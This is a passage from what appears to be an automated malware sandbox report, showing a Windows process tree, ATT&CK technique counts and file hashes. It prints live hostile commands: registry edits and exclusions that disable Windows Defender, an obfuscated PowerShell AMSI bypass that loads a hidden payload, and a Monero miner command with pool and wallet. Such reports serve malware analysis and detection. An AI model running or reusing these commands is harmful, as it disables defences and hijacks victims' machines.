                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 988
                                            9⤵
                                            • Program crash
                                            PID:1012
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 1360
                                            9⤵
                                            • Program crash
                                            PID:4036
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "r68KCX9sUSmVjFbWX1AIpKq5.exe" /f & erase "C:\Users\Admin\Pictures\r68KCX9sUSmVjFbWX1AIpKq5.exe" & exit
                                            9⤵
                                              PID:3788
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im "r68KCX9sUSmVjFbWX1AIpKq5.exe" /f
                                                10⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4292
                                          • C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe
                                            "C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5152
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2920
                                            • C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe
                                              "C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:696
                                          • C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe
                                            "C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6244
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1460
                                            • C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe
                                              "C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:6336
                                          • C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe
                                            "C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5376
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5648
                                            • C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe
                                              "C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:3672
                                          • C:\Users\Admin\Pictures\BVxPj6l9QxCZTHbu40cqRJcP.exe
                                            "C:\Users\Admin\Pictures\BVxPj6l9QxCZTHbu40cqRJcP.exe" /s
                                            8⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Writes to the Master Boot Record (MBR)
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:6300
                                            • C:\Users\Admin\Pictures\360TS_Setup.exe
                                              "C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s
                                              9⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              • Suspicious use of SetWindowsHookEx
                                              PID:7116
                                              • C:\Program Files (x86)\1715729366_0\360TS_Setup.exe
                                                "C:\Program Files (x86)\1715729366_0\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s /TSinstall
                                                10⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Writes to the Master Boot Record (MBR)
                                                • Drops file in Program Files directory
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5548
                                          • C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe
                                            "C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6876
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5832
                                            • C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe
                                              "C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:4600
                                          • C:\Users\Admin\Pictures\NeAGl25FmYwj6ACIaYUtGrMy.exe
                                            "C:\Users\Admin\Pictures\NeAGl25FmYwj6ACIaYUtGrMy.exe"
                                            8⤵
                                            • Modifies firewall policy service
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            • Drops file in System32 directory
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:6044
                                          • C:\Users\Admin\Pictures\2p097Kk7WbMab2fM15eWYNGJ.exe
                                            "C:\Users\Admin\Pictures\2p097Kk7WbMab2fM15eWYNGJ.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5936
                                            • C:\Users\Admin\AppData\Local\Temp\7zSE692.tmp\Install.exe
                                              .\Install.exe /tEdidDDf "385118" /S
                                              9⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              PID:1832
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                10⤵
                                                  PID:4332
                                            • C:\Users\Admin\Pictures\WWuoQ9lCzATl2n5JrfVx9Jgg.exe
                                              "C:\Users\Admin\Pictures\WWuoQ9lCzATl2n5JrfVx9Jgg.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2552
                                            • C:\Users\Admin\Pictures\GwsZj6tQDefT0rTLFEjN1Mih.exe
                                              "C:\Users\Admin\Pictures\GwsZj6tQDefT0rTLFEjN1Mih.exe"
                                              8⤵
                                                PID:5476
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                              7⤵
                                                PID:5556
                                          • C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5144
                                            • C:\Users\Admin\AppData\Local\Temp\$77848fd0
                                              "C:\Users\Admin\AppData\Local\Temp\$77848fd0"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5932
                                            • C:\Users\Admin\AppData\Local\Temp\$77aa2932
                                              "C:\Users\Admin\AppData\Local\Temp\$77aa2932"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:3980
                                      • C:\Users\Admin\1000006002\5b90bb2e7c.exe
                                        "C:\Users\Admin\1000006002\5b90bb2e7c.exe"
                                        3⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:4644
                                      • C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3412
                                  • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                    C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:3972
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3232 -ip 3232
                                    1⤵
                                      PID:1480
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      PID:3160
                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                        "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:2520
                                        • C:\Windows\Temp\336234.exe
                                          "C:\Windows\Temp\336234.exe" --list-devices
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1288
                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                      "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      PID:2580
                                      • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                        "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:5252
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5368 -ip 5368
                                      1⤵
                                        PID:5308
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5368 -ip 5368
                                        1⤵
                                          PID:5912
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5868 -ip 5868
                                          1⤵
                                            PID:5440
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5368 -ip 5368
                                            1⤵
                                              PID:6156
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5368 -ip 5368
                                              1⤵
                                                PID:4528
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5368 -ip 5368
                                                1⤵
                                                  PID:5208
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5368 -ip 5368
                                                  1⤵
                                                    PID:7028
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5368 -ip 5368
                                                    1⤵
                                                      PID:6832
                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                      "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:6732
                                                      • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                        "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:3708
                                                        • C:\Windows\Temp\439140.exe
                                                          "C:\Windows\Temp\439140.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:1480
                                                        • C:\Windows\Temp\425616.exe
                                                          "C:\Windows\Temp\425616.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:3680
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5368 -ip 5368
                                                      1⤵
                                                        PID:5312
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5368 -ip 5368
                                                        1⤵
                                                          PID:2300
                                                        • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                          C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Checks whether UAC is enabled
                                                          PID:6956
                                                        • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                          C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:6316
                                                        • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                          C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:3504
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6700 -ip 6700
                                                          1⤵
                                                            PID:7120
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6700 -ip 6700
                                                            1⤵
                                                              PID:4560
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6700 -ip 6700
                                                              1⤵
                                                                PID:1000
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6700 -ip 6700
                                                                1⤵
                                                                  PID:1688
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6700 -ip 6700
                                                                  1⤵
                                                                    PID:4056
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6700 -ip 6700
                                                                    1⤵
                                                                      PID:6760
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6700 -ip 6700
                                                                      1⤵
                                                                        PID:4864
                                                                      • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                        C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:5864
                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                          2⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:6092
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6700 -ip 6700
                                                                        1⤵
                                                                          PID:968
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TAaeJGhzdxhq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$enSIOqACJBRHfL,[Parameter(Position=1)][Type]$dTtVRRxLxV)$PHSrNVFpTnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+'edD'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+'A'+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$PHSrNVFpTnS.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+'l'+''+'N'+''+[Char](97)+'me,Hi'+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$enSIOqACJBRHfL).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+'e'+''+'d'+'');$PHSrNVFpTnS.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+'k'+'e'+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+'S'+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+'w'+'S'+''+'l'+''+'o'+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l',$dTtVRRxLxV,$enSIOqACJBRHfL).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');Write-Output $PHSrNVFpTnS.CreateType();}$HpbDLupqDITdk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+'em'+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+'32'+'.'+''+'U'+'nsa'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$jfVfMjyNDODQgi=$HpbDLupqDITdk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+'c'+''+'A'+'d'+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NrCqBhSojShlxGasWxA=TAaeJGhzdxhq @([String])([IntPtr]);$aCEpnIfXwQQeHmsQhdiKrk=TAaeJGhzdxhq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$URfRkZlPhey=$HpbDLupqDITdk.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+'l'+'3'+''+[Char](50)+''+'.'+''+'d'+''+'l'+'l')));$YBzavPzjexNOtv=$jfVfMjyNDODQgi.Invoke($Null,@([Object]$URfRkZlPhey,[Object]('L'+'o'+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$FllrsukYvtGRYhgeO=$jfVfMjyNDODQgi.Invoke($Null,@([Object]$URfRkZlPhey,[Object]('V'+'i'+''+'r'+''+[Char](116)+'u'+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$AyyTJKg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YBzavPzjexNOtv,$NrCqBhSojShlxGasWxA).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$jptnufzjdIGnWgvyO=$jfVfMjyNDODQgi.Invoke($Null,@([Object]$AyyTJKg,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+'n'+''+[Char](66)+''+[Char](117)+'ff'+'e'+'r')));$pHqTOeiLyb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FllrsukYvtGRYhgeO,$aCEpnIfXwQQeHmsQhdiKrk).Invoke($jptnufzjdIGnWgvyO,[uint32]8,4,[ref]$pHqTOeiLyb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jptnufzjdIGnWgvyO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FllrsukYvtGRYhgeO,$aCEpnIfXwQQeHmsQhdiKrk).Invoke($jptnufzjdIGnWgvyO,[uint32]8,0x20,[ref]$pHqTOeiLyb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                                          1⤵
                                                                            PID:6992
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6700 -ip 6700
                                                                            1⤵
                                                                              PID:864
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                              1⤵
                                                                                PID:1212
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                1⤵
                                                                                  PID:4704

                                                                                Network

                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                Execution

                                                                                Command and Scripting Interpreter

                                                                                1
                                                                                T1059

                                                                                PowerShell

                                                                                1
                                                                                T1059.001

                                                                                System Services

                                                                                2
                                                                                T1569

                                                                                Service Execution

                                                                                2
                                                                                T1569.002

                                                                                Scheduled Task/Job

                                                                                1
                                                                                T1053

                                                                                Persistence

                                                                                Create or Modify System Process

                                                                                3
                                                                                T1543

                                                                                Windows Service

                                                                                3
                                                                                T1543.003

                                                                                Boot or Logon Autostart Execution

                                                                                1
                                                                                T1547

                                                                                Registry Run Keys / Startup Folder

                                                                                1
                                                                                T1547.001

                                                                                Pre-OS Boot

                                                                                1
                                                                                T1542

                                                                                Bootkit

                                                                                1
                                                                                T1542.003

                                                                                Scheduled Task/Job

                                                                                1
                                                                                T1053

                                                                                Privilege Escalation

                                                                                Create or Modify System Process

                                                                                3
                                                                                T1543

                                                                                Windows Service

                                                                                3
                                                                                T1543.003

                                                                                Boot or Logon Autostart Execution

                                                                                1
                                                                                T1547

                                                                                Registry Run Keys / Startup Folder

                                                                                1
                                                                                T1547.001

                                                                                Scheduled Task/Job

                                                                                1
                                                                                T1053

                                                                                Defense Evasion

                                                                                Modify Registry

                                                                                3
                                                                                T1112

                                                                                Virtualization/Sandbox Evasion

                                                                                2
                                                                                T1497

                                                                                Impair Defenses

                                                                                1
                                                                                T1562

                                                                                Pre-OS Boot

                                                                                1
                                                                                T1542

                                                                                Bootkit

                                                                                1
                                                                                T1542.003

                                                                                Subvert Trust Controls

                                                                                1
                                                                                T1553

                                                                                Install Root Certificate

                                                                                1
                                                                                T1553.004

                                                                                Credential Access

                                                                                Unsecured Credentials

                                                                                2
                                                                                T1552

                                                                                Credentials In Files

                                                                                2
                                                                                T1552.001

                                                                                Discovery

                                                                                Query Registry

                                                                                7
                                                                                T1012

                                                                                Virtualization/Sandbox Evasion

                                                                                2
                                                                                T1497

                                                                                System Information Discovery

                                                                                6
                                                                                T1082

                                                                                Peripheral Device Discovery

                                                                                1
                                                                                T1120

                                                                                Collection

                                                                                Data from Local System

                                                                                2
                                                                                T1005

                                                                                Command and Control

                                                                                Web Service

                                                                                1
                                                                                T1102

                                                                                Impact

                                                                                Service Stop

                                                                                1
                                                                                T1489

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                  Filesize

                                                                                  288KB

                                                                                  MD5

                                                                                  d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                  SHA1

                                                                                  e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                  SHA256

                                                                                  472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                  SHA512

                                                                                  1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                  Filesize

                                                                                  2.5MB

                                                                                  MD5

                                                                                  e6943a08bb91fc3086394c7314be367d

                                                                                  SHA1

                                                                                  451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                  SHA256

                                                                                  aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                  SHA512

                                                                                  505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                  Filesize

                                                                                  5.8MB

                                                                                  MD5

                                                                                  83c47ada39e35da33440eb3d27b5367a

                                                                                  SHA1

                                                                                  3c899ae135ae3c4771f4097580dd15c722a0e751

                                                                                  SHA256

